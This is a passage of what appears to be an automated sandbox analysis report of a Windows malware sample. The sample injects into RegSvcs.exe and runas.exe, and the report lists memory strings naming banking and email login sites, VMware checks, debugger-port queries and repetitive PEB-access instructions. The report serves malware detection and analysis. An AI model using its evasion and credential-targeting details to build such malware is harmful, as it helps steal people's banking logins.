                Source: nK1Y86mbzfbkwpB.exe, 00000000.00000002.2184155901.0000000007461000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 023115.17.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: runas.exe, 00000011.00000002.3360122455.00000000078A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: formVMware20,11696487552
                Source: runas.exe, 00000011.00000002.3360122455.00000000078A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11[
                Source: 023115.17.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 023115.17.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 023115.17.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 023115.17.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 023115.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 023115.17.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 023115.17.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: runas.exe, 00000011.00000002.3360122455.00000000078A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMwareI
                Source: 023115.17.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: runas.exe, 00000011.00000002.3360122455.00000000078A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rdVMware20,11696487552x
                Source: 023115.17.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 023115.17.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 023115.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: runas.exe, 00000011.00000002.3360122455.00000000078A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kofamerica.comVMware20,11696487552x
                Source: 023115.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: runas.exe, 00000011.00000002.3360122455.00000000078A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,1169648x
                Source: 023115.17.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D096E rdtsc 7_2_014D096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00417953 LdrLoadDll,7_2_00417953
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01528158 mov eax, dword ptr fs:[00000030h]7_2_01528158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01524144 mov eax, dword ptr fs:[00000030h]7_2_01524144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01524144 mov eax, dword ptr fs:[00000030h]7_2_01524144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01524144 mov ecx, dword ptr fs:[00000030h]7_2_01524144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01524144 mov eax, dword ptr fs:[00000030h]7_2_01524144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01524144 mov eax, dword ptr fs:[00000030h]7_2_01524144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01496154 mov eax, dword ptr fs:[00000030h]7_2_01496154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01496154 mov eax, dword ptr fs:[00000030h]7_2_01496154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148C156 mov eax, dword ptr fs:[00000030h]7_2_0148C156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01564164 mov eax, dword ptr fs:[00000030h]7_2_01564164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01564164 mov eax, dword ptr fs:[00000030h]7_2_01564164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01550115 mov eax, dword ptr fs:[00000030h]7_2_01550115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153A118 mov ecx, dword ptr fs:[00000030h]7_2_0153A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153A118 mov eax, dword ptr fs:[00000030h]7_2_0153A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153A118 mov eax, dword ptr fs:[00000030h]7_2_0153A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153A118 mov eax, dword ptr fs:[00000030h]7_2_0153A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153E10E mov eax, dword ptr fs:[00000030h]7_2_0153E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153E10E mov ecx, dword ptr fs:[00000030h]7_2_0153E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153E10E mov eax, dword ptr fs:[00000030h]7_2_0153E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153E10E mov eax, dword ptr fs:[00000030h]7_2_0153E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153E10E mov ecx, dword ptr fs:[00000030h]7_2_0153E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153E10E mov eax, dword ptr fs:[00000030h]7_2_0153E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153E10E mov eax, dword ptr fs:[00000030h]7_2_0153E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153E10E mov ecx, dword ptr fs:[00000030h]7_2_0153E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153E10E mov eax, dword ptr fs:[00000030h]7_2_0153E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153E10E mov ecx, dword ptr fs:[00000030h]7_2_0153E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C0124 mov eax, dword ptr fs:[00000030h]7_2_014C0124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150E1D0 mov eax, dword ptr fs:[00000030h]7_2_0150E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150E1D0 mov eax, dword ptr fs:[00000030h]7_2_0150E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150E1D0 mov ecx, dword ptr fs:[00000030h]7_2_0150E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150E1D0 mov eax, dword ptr fs:[00000030h]7_2_0150E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150E1D0 mov eax, dword ptr fs:[00000030h]7_2_0150E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015561C3 mov eax, dword ptr fs:[00000030h]7_2_015561C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015561C3 mov eax, dword ptr fs:[00000030h]7_2_015561C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015661E5 mov eax, dword ptr fs:[00000030h]7_2_015661E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C01F8 mov eax, dword ptr fs:[00000030h]7_2_014C01F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D0185 mov eax, dword ptr fs:[00000030h]7_2_014D0185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151019F mov eax, dword ptr fs:[00000030h]7_2_0151019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151019F mov eax, dword ptr fs:[00000030h]7_2_0151019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151019F mov eax, dword ptr fs:[00000030h]7_2_0151019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151019F mov eax, dword ptr fs:[00000030h]7_2_0151019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01534180 mov eax, dword ptr fs:[00000030h]7_2_01534180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01534180 mov eax, dword ptr fs:[00000030h]7_2_01534180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0154C188 mov eax, dword ptr fs:[00000030h]7_2_0154C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0154C188 mov eax, dword ptr fs:[00000030h]7_2_0154C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148A197 mov eax, dword ptr fs:[00000030h]7_2_0148A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148A197 mov eax, dword ptr fs:[00000030h]7_2_0148A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148A197 mov eax, dword ptr fs:[00000030h]7_2_0148A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01516050 mov eax, dword ptr fs:[00000030h]7_2_01516050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01492050 mov eax, dword ptr fs:[00000030h]7_2_01492050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BC073 mov eax, dword ptr fs:[00000030h]7_2_014BC073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01514000 mov ecx, dword ptr fs:[00000030h]7_2_01514000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01532000 mov eax, dword ptr fs:[00000030h]7_2_01532000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01532000 mov eax, dword ptr fs:[00000030h]7_2_01532000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01532000 mov eax, dword ptr fs:[00000030h]7_2_01532000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01532000 mov eax, dword ptr fs:[00000030h]7_2_01532000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01532000 mov eax, dword ptr fs:[00000030h]7_2_01532000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01532000 mov eax, dword ptr fs:[00000030h]7_2_01532000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01532000 mov eax, dword ptr fs:[00000030h]7_2_01532000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01532000 mov eax, dword ptr fs:[00000030h]7_2_01532000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014AE016 mov eax, dword ptr fs:[00000030h]7_2_014AE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014AE016 mov eax, dword ptr fs:[00000030h]7_2_014AE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014AE016 mov eax, dword ptr fs:[00000030h]7_2_014AE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014AE016 mov eax, dword ptr fs:[00000030h]7_2_014AE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01526030 mov eax, dword ptr fs:[00000030h]7_2_01526030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148A020 mov eax, dword ptr fs:[00000030h]7_2_0148A020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148C020 mov eax, dword ptr fs:[00000030h]7_2_0148C020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015120DE mov eax, dword ptr fs:[00000030h]7_2_015120DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014980E9 mov eax, dword ptr fs:[00000030h]7_2_014980E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148A0E3 mov ecx, dword ptr fs:[00000030h]7_2_0148A0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015160E0 mov eax, dword ptr fs:[00000030h]7_2_015160E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148C0F0 mov eax, dword ptr fs:[00000030h]7_2_0148C0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D20F0 mov ecx, dword ptr fs:[00000030h]7_2_014D20F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149208A mov eax, dword ptr fs:[00000030h]7_2_0149208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014880A0 mov eax, dword ptr fs:[00000030h]7_2_014880A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015560B8 mov eax, dword ptr fs:[00000030h]7_2_015560B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015560B8 mov ecx, dword ptr fs:[00000030h]7_2_015560B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015280A8 mov eax, dword ptr fs:[00000030h]7_2_015280A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01538350 mov ecx, dword ptr fs:[00000030h]7_2_01538350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0155A352 mov eax, dword ptr fs:[00000030h]7_2_0155A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151035C mov eax, dword ptr fs:[00000030h]7_2_0151035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151035C mov eax, dword ptr fs:[00000030h]7_2_0151035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151035C mov eax, dword ptr fs:[00000030h]7_2_0151035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151035C mov ecx, dword ptr fs:[00000030h]7_2_0151035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151035C mov eax, dword ptr fs:[00000030h]7_2_0151035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151035C mov eax, dword ptr fs:[00000030h]7_2_0151035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]7_2_01512349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]7_2_01512349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]7_2_01512349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]7_2_01512349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]7_2_01512349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]7_2_01512349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]7_2_01512349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]7_2_01512349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]7_2_01512349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]7_2_01512349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]7_2_01512349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]7_2_01512349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]7_2_01512349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]7_2_01512349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]7_2_01512349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0156634F mov eax, dword ptr fs:[00000030h]7_2_0156634F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153437C mov eax, dword ptr fs:[00000030h]7_2_0153437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CA30B mov eax, dword ptr fs:[00000030h]7_2_014CA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CA30B mov eax, dword ptr fs:[00000030h]7_2_014CA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CA30B mov eax, dword ptr fs:[00000030h]7_2_014CA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148C310 mov ecx, dword ptr fs:[00000030h]7_2_0148C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B0310 mov ecx, dword ptr fs:[00000030h]7_2_014B0310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01568324 mov eax, dword ptr fs:[00000030h]7_2_01568324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01568324 mov ecx, dword ptr fs:[00000030h]7_2_01568324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01568324 mov eax, dword ptr fs:[00000030h]7_2_01568324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01568324 mov eax, dword ptr fs:[00000030h]7_2_01568324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015343D4 mov eax, dword ptr fs:[00000030h]7_2_015343D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015343D4 mov eax, dword ptr fs:[00000030h]7_2_015343D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153E3DB mov eax, dword ptr fs:[00000030h]7_2_0153E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153E3DB mov eax, dword ptr fs:[00000030h]7_2_0153E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153E3DB mov ecx, dword ptr fs:[00000030h]7_2_0153E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153E3DB mov eax, dword ptr fs:[00000030h]7_2_0153E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149A3C0 mov eax, dword ptr fs:[00000030h]7_2_0149A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149A3C0 mov eax, dword ptr fs:[00000030h]7_2_0149A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149A3C0 mov eax, dword ptr fs:[00000030h]7_2_0149A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149A3C0 mov eax, dword ptr fs:[00000030h]7_2_0149A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149A3C0 mov eax, dword ptr fs:[00000030h]7_2_0149A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149A3C0 mov eax, dword ptr fs:[00000030h]7_2_0149A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014983C0 mov eax, dword ptr fs:[00000030h]7_2_014983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014983C0 mov eax, dword ptr fs:[00000030h]7_2_014983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014983C0 mov eax, dword ptr fs:[00000030h]7_2_014983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014983C0 mov eax, dword ptr fs:[00000030h]7_2_014983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015163C0 mov eax, dword ptr fs:[00000030h]7_2_015163C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0154C3CD mov eax, dword ptr fs:[00000030h]7_2_0154C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A03E9 mov eax, dword ptr fs:[00000030h]7_2_014A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A03E9 mov eax, dword ptr fs:[00000030h]7_2_014A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A03E9 mov eax, dword ptr fs:[00000030h]7_2_014A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A03E9 mov eax, dword ptr fs:[00000030h]7_2_014A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A03E9 mov eax, dword ptr fs:[00000030h]7_2_014A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A03E9 mov eax, dword ptr fs:[00000030h]7_2_014A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A03E9 mov eax, dword ptr fs:[00000030h]7_2_014A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A03E9 mov eax, dword ptr fs:[00000030h]7_2_014A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C63FF mov eax, dword ptr fs:[00000030h]7_2_014C63FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014AE3F0 mov eax, dword ptr fs:[00000030h]7_2_014AE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014AE3F0 mov eax, dword ptr fs:[00000030h]7_2_014AE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014AE3F0 mov eax, dword ptr fs:[00000030h]7_2_014AE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148E388 mov eax, dword ptr fs:[00000030h]7_2_0148E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148E388 mov eax, dword ptr fs:[00000030h]7_2_0148E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148E388 mov eax, dword ptr fs:[00000030h]7_2_0148E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B438F mov eax, dword ptr fs:[00000030h]7_2_014B438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B438F mov eax, dword ptr fs:[00000030h]7_2_014B438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01488397 mov eax, dword ptr fs:[00000030h]7_2_01488397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01488397 mov eax, dword ptr fs:[00000030h]7_2_01488397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01488397 mov eax, dword ptr fs:[00000030h]7_2_01488397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0154A250 mov eax, dword ptr fs:[00000030h]7_2_0154A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0154A250 mov eax, dword ptr fs:[00000030h]7_2_0154A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0156625D mov eax, dword ptr fs:[00000030h]7_2_0156625D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01496259 mov eax, dword ptr fs:[00000030h]7_2_01496259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01518243 mov eax, dword ptr fs:[00000030h]7_2_01518243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01518243 mov ecx, dword ptr fs:[00000030h]7_2_01518243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148A250 mov eax, dword ptr fs:[00000030h]7_2_0148A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
